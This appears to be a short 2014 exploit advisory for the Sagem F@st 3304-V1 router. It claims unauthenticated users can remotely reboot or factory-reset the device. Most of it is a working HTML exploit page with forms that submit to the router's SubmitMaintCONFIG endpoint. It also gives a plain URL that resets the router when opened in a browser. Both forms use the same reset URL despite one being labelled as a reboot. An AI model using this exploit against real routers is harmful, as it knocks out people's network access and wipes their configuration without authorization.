# Title: Sagem F@st 3304-V1 denial of service Vulnerability# Vendor Homepage: http://www.sagemcom.com# Tested on: Firefox, Google Chrome# Tested Router: Sagem F@st 3304-V1 # Date : 2014-07-26# Author : Z3ro0ne# Contact: saadousfar59@gmail.com# Facebook Page: https://www.facebook.com/Z3ro0ne# Vulnerability description :
the Vulnerability allow unauthenticated users to remotely restart and reset the router
# Exploit:<html><title>SAGEM FAST3304-V1 DENIAL OF SERVICE</title><body><FORM ACTION="http://192.168.1.1/SubmitMaintCONFIG?ACTION=R%E9tablir+la+configuration+initiale"><INPUT TYPE="SUBMIT" VALUE="REBOOT ROUTER"></FORM><FORM ACTION="http://192.168.1.1/SubmitMaintCONFIG?ACTION=R%E9tablir+la+configuration+initiale"><INPUT TYPE="SUBMIT" VALUE="FACTORY RESET"></FORM></body></html>
Reset to factory configuration :--- Using Google Chrome browser :
to reset the router without any authentication just execute the following url http://ROUTER-ipaddress/SubmitMaintCONFIG?ACTION=R%E9tablir+la+configuration+initiale in the url bar
